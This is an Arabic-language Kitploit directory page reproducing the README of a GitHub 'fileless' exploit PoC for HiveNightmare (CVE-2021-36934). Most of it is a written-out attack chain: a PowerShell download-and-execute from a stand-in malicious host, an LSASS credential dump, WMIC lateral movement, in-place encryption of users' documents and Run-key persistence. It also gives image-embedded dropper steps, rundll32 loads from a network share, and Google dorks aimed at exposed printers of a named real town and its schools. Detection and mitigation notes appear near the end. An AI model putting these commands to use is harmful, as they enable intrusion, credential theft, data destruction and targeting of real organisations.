Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Why-so-Serious-SAM — برنامج خبيث من نوع PoC يستغل ثغرة CVE-2021-36934 (قوائم تحكم وصول غير صحيحة على نسخ الظل) باستخدام أسلوب فريق أحمر بدون ملفات على ويندوز 10/11 مع LOLBins، لاستخراج خلايا التسجيل SYSTEM وSAM للحصول على تجزئات NTLM المحلية. | Kitploit
أدوات/GitHubGitHub/p1rat3r00t/why-so-serious-sam
تصعيد الامتيازاتالاستغلالالحركة الجانبيةما بعد الاستغلالCTFاختبار الاختراقالتعلم والتعليمالفريق الأحمرمختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubp1rat3r00t/why-so-serious-sam

Why-so-Serious-SAM

برنامج خبيث من نوع PoC يستغل ثغرة CVE-2021-36934 (قوائم تحكم وصول غير صحيحة على نسخ الظل) باستخدام أسلوب فريق أحمر بدون ملفات على ويندوز 10/11 مع LOLBins، لاستخراج خلايا التسجيل SYSTEM وSAM للحصول على تجزئات NTLM المحلية.

عرض المستودعالموقع الإلكتروني
1منذ سنة واحدةلم تتم المراجعة بعد

HiveNightmare 'Fileless' Exploit PoC:

Screenshot 2025-05-21 001453


جدول المحتويات

  • نظرة عامة
  • الميزات
  • مثال محاكاة المختبر
  • الاستطلاع باستخدام Google Dorks
  • نظرة عامة على LOLBins
  • تضمين المُسقط بدون ملفات
  • استغلال Print Spooler وHiveNightmare
  • حقن DLL الانعكاسي
  • تخطيط MITRE ATT&CK
  • الاكتشاف والتخفيف
  • إخلاء المسؤولية القانوني
  • المراجع وقراءات إضافية

نظرة عامة

CVE-2021-36934/HiveNightmare هو مشروع بحثي تعليمي للفريق الأحمر/البنفسجي يحاكي إطار عمل هجوم برمجيات خبيثة بدون ملفات على Windows 11. وهو يتيح محاكاة سلاسل القتل الواقعية للخصوم باستخدام تقنيات MITRE ATT&CK، مع التركيز على العمليات السرية الخالية من الملفات.

تحذير: للبحث والتدريب في مختبرات معزولة فقط. لا تستخدمه على أنظمة الإنتاج أو الأنظمة غير المصرح بها.


الميزات

  • يحاكي هجمات برمجيات الفدية/الماسحات بدون ملفات من البداية إلى النهاية
  • يوضح استخدام الثنائيات المعتمدة على أدوات النظام (LOLBins)
  • يستعرض الوصول إلى بيانات الاعتماد، وتصعيد الامتيازات، والحركة الجانبية، والاستمرارية
  • يحتوي على أمثلة عملية للمختبر والاستطلاع
  • يرتبط بمعيار MITRE ATT&CK لتمارين اكتشاف الفريق الأزرق

مثال محاكاة المختبر

توضح محاكاة PowerShell التالية سلسلة هجوم نموذجية لبرمجية فدية بدون ملفات باستخدام أدوات Windows المدمجة (LOLBins):

root@kitploit:~
# Initial Access: Load dropper
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# Execution: Decode and load in-memory payload
$bytes = [System.Convert]::FromBase64String("[Base64Payload]") 
[System.Reflection.Assembly]:https://raw.githubusercontent.com/p1rat3r00t/why-so-serious-sam/HEAD/:Load($bytes)

# Privilege Escalation
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# Credential Access
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# Lateral Movement
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# File Encryption Example
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = Get-Content $file.FullName -Raw
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# Persistence
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"

الاستطلاع باستخدام Google Dorks

الهدف المثال: تحديد خدمات الطابعات المكشوفة للعموم في موبرلي بولاية ميزوري، والتي قد تكون عرضة لاستغلالات مثل PrintNightmare.

نماذج استعلامات Google Dork:

root@kitploit:~
inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"

نظرة عامة على LOLBins

الثنائيات المعتمدة على أدوات النظام (LOLBins) هي ثنائيات Windows شرعية وموثوقة يسيء الخصوم استخدامها بشكل شائع لتجاوز الضوابط الأمنية وتشغيل تعليمات برمجية خبيثة بدون ملفات.

مثال على الاستخدام (هجوم خدمة الطباعة):

root@kitploit:~
rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry

يستخدم المهاجمون أدوات LOLBins مثل rundll32.exe وregsvr32.exe وpowershell.exe لتنفيذ الحمولات من المشاركات الشبكية، غالباً بعد تحديد الطابعات أو الخوادم المكشوفة عبر الاستطلاع.


تضمين المُسقط بدون ملفات

الهدف: إيصال الحمولات سراً عن طريق تضمين الأرشيفات داخل الصور واستخراجها باستخدام الأدوات الأصلية.

الخطوات:

  1. تضمين الحمولة:

    root@kitploit:~
    copy /b nsfw.jpg + payload.7z nsfw.jpg
    
  2. الاستخراج وفك الترميز:

    root@kitploit:~
    certutil -decode nsfw.jpg dropper.7z
    7z x dropper.7z -oC:\Users\Public\
    

تتجاوز هذه الطريقة التصفية التقليدية لامتدادات الملفات وتستفيد من الأدوات المدمجة للإيصال التهربي.


حقن DLL الانعكاسي

التقنية: تحميل وتنفيذ مكتبة DLL خبيثة مباشرة في الذاكرة باستخدام التحميل الانعكاسي.

مثال:

root@kitploit:~
rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry

يتيح هذا تنفيذاً سرياً داخل الذاكرة دون ترك آثار على القرص.


تخطيط MITRE ATT&CK


الاكتشاف والتخفيف

الاكتشاف

  • قواعد Sysmon + Sigma:

    • مراقبة قيام rundll32.exe بتحميل مكتبات DLL غير تابعة للنظام
    • مراقبة الاستخدام غير الطبيعي لـ certutil.exe وregsvr32.exe وmshta.exe
    • تتبع وصول غير المسؤولين إلى وحدات التخزين الظلية
  • أمثلة SIEM (ELK/Splunk):

    • تنبيهات حول التنفيذ من مشاركات عامة
    • شذوذ في عمليات الأصل/الفرع (على سبيل المثال، استدعاء explorer.exe لـ rundll32.exe)
    • أوامر مشفرة مشبوهة في PowerShell أو CMD

التخفيف

  • تعطيل Print Spooler حيث لا تكون هناك حاجة إليه:
    root@kitploit:~
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
    
  • تطبيق جميع التصحيحات الأمنية وتقوية قوائم ACL
  • حظر أو تقييد LOLBins باستخدام AppLocker أو WDAC
  • استخدام حلول EDR التي تكتشف التحميل الانعكاسي لمكتبات DLL والهجمات داخل الذاكرة

إخلاء المسؤولية القانوني

جميع المحتويات والأكواد والتقنيات في هذا المستودع مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. لا تستخدم أي جزء من هذا المشروع خارج البيئات المتحكم بها والمعزولة وبدون إذن صريح. لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام.


المراجع وقراءات إضافية

  • LOLOL Farm – LOLBin Playground
  • LOLGEN – Generate LOLBin Chains
  • Detecting SeriousSam
  • DLL Injection Primer
  • Print Spooler Exploit Chain
  • Fileless Malware – Wikipedia
  • PrintSpoofer (Original)
  • HiveNightmare
  • Mitre Attck T1055
  • Hivenightmare demo

ابقَ آمناً، وابحث بمسؤولية، واستخدمه دائماً بطريقة قانونية وأخلاقية.

تنزيل الأداة
المرحلةالتقنيةالمعرّفالوصف
الوصول الأوليالحسابات الصالحة / التسوية عبر التصفحT1078, T1189تسوية واجهات الطباعة المكشوفة للعموم
التنفيذالتحميل الجانبي لمكتبات DLL / LOLBinsT1218, T1055.001تشغيل مكتبات DLL بشكل انعكاسي عبر ثنائيات موثوقة
تصعيد الامتيازاتاستغلالات Print Spooler / إساءة استخدام صلاحيات ACL لـ HiveT1068, T1003.002وصول بمستوى SYSTEM واستخراج هاشات SAM
التهرب من الدفاعاتتنفيذ بدون ملفات / ملفات مبهمةT1027, T1202حمولات مشفرة تُسلَّم عبر certutil وmshta وغيرها
الوصول إلى بيانات الاعتمادتفريغ LSASS / الوصول إلى Hive SAMT1003تفريغ بيانات الاعتماد بعد HiveNightmare
الحركة الجانبيةتعداد مشاركات SMB/NetT1021.002الانتشار عبر مشاركات الطابعات أو تعداد spooler
التأثيرتدمير البيانات / التشفيرT1485, T1486برمجية ماسحة بدون ملفات يتم تشغيلها عبر حمولات DLL